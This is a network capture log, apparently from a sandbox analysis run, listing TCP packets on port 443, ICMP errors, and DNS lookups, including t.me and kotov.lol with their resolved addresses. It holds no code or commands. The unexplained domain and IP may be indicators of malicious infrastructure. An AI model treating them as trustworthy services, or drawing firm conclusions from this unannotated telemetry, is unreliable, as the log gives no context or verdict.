Nov 29, 2024 12:28:36.888941050 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:36.896281958 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:36.896295071 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:36.896352053 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:36.896693945 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:36.908843040 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:37.242044926 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:37.246925116 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:37.246990919 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:37.247001886 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:37.247224092 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:37.255546093 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:37.588763952 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:37.597414017 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:37.597434044 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:37.597523928 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:37.597981930 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:37.607079983 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:37.940516949 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:37.945220947 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:37.945241928 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:37.945316076 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:37.945574999 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:37.953046083 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:38.287867069 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:38.293653965 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:38.293684959 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:38.293837070 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:38.293951035 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:38.302671909 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:38.666438103 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:38.681184053 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:38.681196928 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:38.681206942 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:38.681613922 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:38.689662933 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:39.023010015 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:39.030262947 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:39.030289888 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:39.030421019 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:39.030675888 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:39.038147926 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:39.371881962 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:39.379277945 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:39.379302979 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:39.379395008 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:39.379661083 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:39.392633915 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:39.725929022 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:39.731426001 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:39.731446028 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:39.731528997 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:39.731811047 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:39.739386082 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:40.072767973 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:40.078876972 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:40.079025030 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:40.079035044 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:40.079308033 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:40.086343050 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:40.419692993 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:40.427066088 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:40.427081108 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:40.427202940 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:40.427431107 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:40.433574915 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:40.768038034 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:40.775444984 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:40.775511980 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:40.775605917 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:40.775616884 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:40.775703907 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:40.807737112 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:40.810683012 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:41.140827894 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:41.143990993 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:41.148600101 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:41.148629904 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:41.148883104 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:41.149077892 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:41.155704021 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:41.488701105 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:41.494981050 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:41.495016098 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:41.495135069 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:41.495338917 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:41.501931906 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:41.835175991 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:41.842466116 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:41.842479944 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:41.842632055 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:41.842777967 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:41.851279020 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:42.184920073 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:42.191545963 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:42.191606998 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:42.191668987 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:42.192605019 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:42.200653076 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:42.534073114 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:42.538480043 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:42.538494110 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:42.538573027 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:42.538789988 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:42.545304060 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:42.878942013 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:42.886229038 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:42.886245966 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:42.886336088 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:42.886651993 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:42.893584013 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:43.226963043 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:43.239829063 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:43.239842892 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:43.239854097 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:43.240180969 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:43.246504068 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:43.733875036 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:43.734239101 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:43.753335953 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:44.245325089 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:44.245754004 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:44.251735926 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:44.251810074 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:44.251857996 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:44.252197027 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:44.252245903 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:44.265728951 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:44.356688976 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:44.585572004 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:44.599208117 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:44.605681896 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:44.605701923 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:44.605755091 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:44.606126070 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:44.614722967 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:44.948048115 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:44.955037117 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:44.955076933 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:44.955235004 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:44.955467939 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:44.965426922 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:45.298856020 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:45.305037022 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:45.305048943 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:45.305154085 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:45.305336952 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:45.316054106 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:45.649338961 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:45.655807018 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:45.655822992 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:45.655911922 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:45.656163931 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:45.663976908 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:45.997591972 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:46.004067898 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:46.004172087 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:46.004221916 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:46.004414082 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:46.011784077 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:46.345196962 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:46.350752115 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:46.350797892 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:46.350810051 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:46.351140976 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:46.357909918 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:46.691328049 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:46.703367949 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:46.703383923 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:46.703392982 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:46.703772068 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:46.711833000 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:47.045190096 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:47.051569939 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:47.051584005 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:47.051593065 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:47.052000999 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:47.060158968 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:47.394325972 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:47.399305105 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:47.399322987 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:47.399972916 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:47.401381969 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:47.410270929 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:47.766480923 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:47.766498089 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:47.766511917 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:47.766525030 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:47.767280102 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:47.775185108 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:48.109323025 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:48.115041971 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:48.115056038 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:48.115175009 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:48.115452051 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:48.123933077 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:48.457659960 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:48.463176012 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:48.463186979 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:48.463464975 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:48.465652943 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:48.470480919 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:48.804016113 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:48.808948994 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:48.808962107 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:48.809087992 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:48.809227943 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:48.815888882 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:49.149832010 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:49.155694962 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:49.155723095 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:49.156014919 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:49.156162977 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:49.164099932 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:49.497472048 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:49.504757881 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:49.504815102 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:49.504848003 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:49.505050898 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:49.511760950 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:49.845104933 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:49.851176977 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:49.851217985 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:49.851253033 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:49.851280928 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:49.851480961 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:49.879482985 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:50.211337090 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:57.133209944 CET	62853	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:57.133338928 CET	62853	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:57.133575916 CET	62853	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:57.133661032 CET	62853	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:58.144269943 CET	62853	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:58.144459963 CET	62853	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:58.144833088 CET	62853	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:58.144869089 CET	62853	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:58.273255110 CET	443	62853	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:58.274066925 CET	62853	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:58.286375046 CET	62853	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:58.286463976 CET	62853	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:58.477773905 CET	443	62853	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:58.477794886 CET	443	62853	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:58.477798939 CET	443	62853	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:58.477803946 CET	443	62853	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:58.477817059 CET	443	62853	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:58.478425980 CET	62853	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:58.478425980 CET	62853	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:58.478465080 CET	62853	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:58.487879992 CET	62853	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:58.607382059 CET	443	62853	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:58.620071888 CET	443	62853	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:58.621642113 CET	443	62853	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:58.621748924 CET	443	62853	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:58.621850967 CET	62853	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:58.659707069 CET	62853	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:58.811495066 CET	443	62853	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:58.821825981 CET	443	62853	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:58.858220100 CET	62853	443	192.168.2.8	162.159.61.3

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Nov 29, 2024 12:27:39.534219980 CET	192.168.2.8	1.1.1.1	c237	(Port unreachable)	Destination Unreachable
Nov 29, 2024 12:27:54.149296045 CET	192.168.2.8	1.1.1.1	c2aa	(Port unreachable)	Destination Unreachable
Nov 29, 2024 12:27:57.291296959 CET	192.168.2.8	1.1.1.1	c24e	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 29, 2024 12:27:18.088665962 CET	192.168.2.8	1.1.1.1	0x312d	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:20.231327057 CET	192.168.2.8	1.1.1.1	0xc17e	Standard query (0)	kotov.lol	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:39.460747957 CET	192.168.2.8	1.1.1.1	0x293b	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:39.460927010 CET	192.168.2.8	1.1.1.1	0xfca5	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 29, 2024 12:27:53.767076969 CET	192.168.2.8	1.1.1.1	0xcac1	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:53.767240047 CET	192.168.2.8	1.1.1.1	0xfd34	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Nov 29, 2024 12:27:56.057786942 CET	192.168.2.8	1.1.1.1	0xf36c	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:56.057940006 CET	192.168.2.8	1.1.1.1	0xb723	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Nov 29, 2024 12:27:57.044857025 CET	192.168.2.8	1.1.1.1	0x467e	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:57.045017958 CET	192.168.2.8	1.1.1.1	0x858c	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false
Nov 29, 2024 12:27:58.530965090 CET	192.168.2.8	1.1.1.1	0x37c3	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:58.531459093 CET	192.168.2.8	1.1.1.1	0x8718	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 29, 2024 12:27:58.531980991 CET	192.168.2.8	1.1.1.1	0xccb1	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:58.532144070 CET	192.168.2.8	1.1.1.1	0x5848	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 29, 2024 12:27:58.635548115 CET	192.168.2.8	1.1.1.1	0xb222	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:58.635986090 CET	192.168.2.8	1.1.1.1	0x81ee	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 29, 2024 12:27:59.281112909 CET	192.168.2.8	1.1.1.1	0xda45	Standard query (0)	sb.scorecardresearch.com	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:59.281464100 CET	192.168.2.8	1.1.1.1	0x88fe	Standard query (0)	sb.scorecardresearch.com	65	IN (0x0001)	false
Nov 29, 2024 12:27:59.303028107 CET	192.168.2.8	1.1.1.1	0x63b	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:59.303179979 CET	192.168.2.8	1.1.1.1	0x239a	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Nov 29, 2024 12:27:59.424503088 CET	192.168.2.8	1.1.1.1	0x3d0a	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:59.424669027 CET	192.168.2.8	1.1.1.1	0x356d	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Nov 29, 2024 12:27:59.573692083 CET	192.168.2.8	1.1.1.1	0x1e94	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:59.573858023 CET	192.168.2.8	1.1.1.1	0x1ce7	Standard query (0)	api.msn.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 29, 2024 12:27:18.229232073 CET	1.1.1.1	192.168.2.8	0x312d	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:20.632962942 CET	1.1.1.1	192.168.2.8	0xc17e	No error (0)	kotov.lol		95.217.25.228	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:39.600445986 CET	1.1.1.1	192.168.2.8	0x293b	No error (0)	www.google.com		142.250.181.68	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:39.600570917 CET	1.1.1.1	192.168.2.8	0xfca5	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 29, 2024 12:27:53.911269903 CET	1.1.1.1	192.168.2.8	0xcac1	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 12:27:53.911984921 CET	1.1.1.1	192.168.2.8	0xfd34	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 12:27:54.362755060 CET	1.1.1.1	192.168.2.8	0xd151	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 12:27:54.362793922 CET	1.1.1.1	192.168.2.8	0xdbc	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 12:27:54.362793922 CET	1.1.1.1	192.168.2.8	0xdbc	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:56.198798895 CET	1.1.1.1	192.168.2.8	0xf36c	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 12:27:56.198827982 CET	1.1.1.1	192.168.2.8	0xb723	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 12:27:57.184724092 CET	1.1.1.1	192.168.2.8	0x467e	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 12:27:57.184724092 CET	1.1.1.1	192.168.2.8	0x467e	No error (0)	googlehosted.l.googleusercontent.com		142.250.181.65	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:57.291213036 CET	1.1.1.1	192.168.2.8	0x858c	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
